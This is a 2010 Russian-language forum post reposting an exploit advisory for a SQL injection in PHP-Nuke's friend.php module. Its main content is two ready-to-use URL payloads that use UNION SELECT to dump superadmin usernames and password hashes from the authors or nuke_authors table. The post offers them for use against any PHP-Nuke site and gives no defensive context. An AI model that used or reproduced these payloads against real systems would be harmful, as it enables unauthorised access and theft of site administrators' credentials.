07.05.2010, 19:07
|
|
Постоянный
Регистрация: 26.07.2009
Сообщений: 321
Провел на форуме:
444589
Репутация:
123
|
|
# Exploit Title: [PHP-Nuke 'friend.php' Module Remote SQL Injection]
# Date: [05.05.2010]
# Author: [CMD]
# Contact : cemede@ilkposta.com
# Version: [all version]
Example1:
Код:
www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/authors/**/where/**/radminsuper=1/*
Example2:
Код:
www.target.com/friend.php?op=FriendSend&sid=392/**/and/**/1=0/**/union/**/select/**/group_concat(aid,0x3a,pwd)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
|
|
|